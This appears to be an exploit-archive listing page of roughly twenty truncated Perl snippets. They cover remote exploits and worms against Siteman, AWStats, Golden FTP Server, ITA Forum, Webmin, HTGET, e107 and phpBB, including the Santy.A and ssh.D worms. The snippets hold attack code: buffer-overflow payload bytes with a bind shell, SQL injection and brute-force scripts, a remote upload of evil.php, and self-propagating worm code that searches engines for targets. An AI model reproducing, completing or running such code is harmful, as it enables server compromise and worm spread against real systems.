Siteman <= 1.1.10 Remote Administrative Account Addition Exploit

No description provided by source. !/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: "amironline452" [email protected] use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.hos...

AWStats configdir Remote Command Execution Exploit (perl code)

No description provided by source. !/usr/bin/perl ---GHC--------------------------------- Remote command execution exploit Product: Advanced Web Statistics 6.0 - 6.2 URL:http://awstats.sourceforge.net Greets & respects to our friends: 1dt.w0lf and all rst.void.ru Special greets 2 d0G4 & cr0n for...

Siteman 1.1.10 - Remote Administrative Account Addition

!/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: "amironline452" use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.host my $Path = shift; my $Host = shift; my $Username = shift; my...

goldenSploit.pl

For the millions that use this ftp server: http://www.goldenftpserver.com/ It has numerous cool features, like no authentication whatsoever, typos in error messages, buffer overflows etc... I just opened it up when my dog jumped on the keyboard and accidentally send a specially crafted packet to...

Golden FTP Server 2.02b - Remote Buffer Overflow

!/usr/bin/perl -w Barabas - www.whitehat.co.il - cheers to muts and all peeps at WH. XPSP2 goldenftpserver sploit - bind 4444 use strict; use Net::FTP; my $payload="\x41"x260; $payload .="\x65\x82\xa5\x7c";jmpesp $payload .="\x90"x32;not really necessary...blah win32bind - EXITFUNC=seh LPORT=4444...

Golden FTP Server 2.02b - Remote Buffer Overflow

Golden FTP Server 2.02b - Remote Buffer Overflow !/usr/bin/perl -w Barabas - www.whitehat.co.il - cheers to muts and all peeps at WH. XPSP2 goldenftpserver sploit - bind 4444 use strict; use Net::FTP; my $payload="\x41"x260; $payload .="\x65\x82\xa5\x7c";jmpesp $payload .="\x90"x32;not really...

r57ita.pl.txt

!/usr/bin/perl use LWP::UserAgent; ITA Forum 1.49 sql injection exploit with one char bruteforce by 1dt.w0lf // r57 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: example: r57ita.pl http://127.0.0.1/ITA/ admin 0 ! Exploiting adduser.php...

ITA Forum <= 1.49 SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; ITA Forum 1.49 sql injection exploit with one char bruteforce by 1dt.w0lf // r57 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: example: r57ita.pl http://127.0.0.1/ITA...

Webmin BruteForce + Command Execution v1.5

No description provided by source. !/usr/bin/perl Webmin BruteForce + Command execution v1.0:By Di42lo - [email protected] v1.5:By ZzagorR - [email protected] - www.rootbinbash.com add script: 1.wordlist func. 2.log line:41 usage: ./webmin1.pl host command wordlist ./webmin1.pl...

Webmin Web Brute Force v1.5 (cgi-version)

Exploit for multiple platform in category remote exploits ========================================= Webmin Web Brute Force v1.5 cgi-version ========================================= !/usr/bin/perl use CGI qw:standard; use IO::Socket; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"...

phpbb.ssh.D.txt

/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE"; $SIG"HUP" = "IGNORE"; $SIG"TERM" ...

HTGET <= 0.9.x Local Root Exploit

No description provided by source. !/usr/bin/perl ^^^^^^^^^^^^^^^^....,,,,|::::::: HTGET = 0.9.x local lame r00t exploit written by nekd0 of Unl0ck Research Team c .unl0ck research team 2004-2005. http://unl0ck.void.ru ................/^^^^''''|:::::::---- $shellcode =...

phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)

No description provided by source. !/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE...

PhpIncludeWorm.txt

!/usr/bin/perl use LWP::Simple; use IO::Socket::INET; while1 $numr = int rand9999; $caxe = "."; $caxe1 = "."; $caxe .= rand9999; $caxe1 .= rand9999; $arq = "."; $arq = int rand9999; opensites,"$arq"; print sites ""; closesites; $procura = 'inurl:.php?=' . $numr; for$n=0;$nnewPeerAddr =...

eboard40.txt

Hi, I found a vulnerability in eBoard ver. 4.0 which allows remote users to open any file on the system. I think all prior vers have the same problem. eBoard is a wwwboard-like CGI script. It's written by Mike Bagneski in Perl and for sale! $14.95. http://www.e-scripts.com/eboard/ It doesn't chec...

e107.pl.txt

| | | | | | |/ \ \ /\ / / | | | | \ V V / || ||/ // Security Group. -= e107 remote sploit =- by sysbug Attack method: with this sploit u can send an include vuln to a Host victim the upload go to /images/evil.php C:\Perl\binperl sploit.pl www.site.com -= e107 remote sploit =- by sysbug...

Sanity.b - phpBB 2.0.10 Bot Install (AOLYahoo Search)

Sanity.b - phpBB 2.0.10 Bot Install AOLYahoo Search /usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ""; $a=0; $numero = int rand999; $site = "search.aol.com"; $procura = "viewtopic.php%3Ft%3D$numero"; for$n=0;$nnewPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET...

Webmin BruteForce and Command Execution Exploit

Exploit for multiple platform in category remote exploits =============================================== Webmin BruteForce and Command Execution Exploit =============================================== !/usr/bin/perl Webmin BruteForce + Command execution - By Di42lo usage ./bruteforce.webmin.pl...

e107 - include() Remote File Upload

e107 - include Remote File Upload | | | | | | |/ \ \ /\ / / | | | | \ V V / || ||/ // Security Group. -= e107 remote sploit =- by sysbug Attack method: with this sploit u can send an include vuln to a Host victim the upload go to /images/evil.php C:\Perl\binperl sploit.pl www.site.com -= e107...

phpBB highlight Arbitrary File Upload (Santy.A)

No description provided by source. Santy.A - phpBB = 2.0.10 Web Worm Source Code Proof of Concept -SECU For educational purpose See : http://isc.sans.org/diary.php?date=2004-12-21 http://www.f-secure.com/v-descs/santya.shtml !/usr/bin/perl use strict; use Socket; sub PayLoad; sub DoDir$; sub DoFi...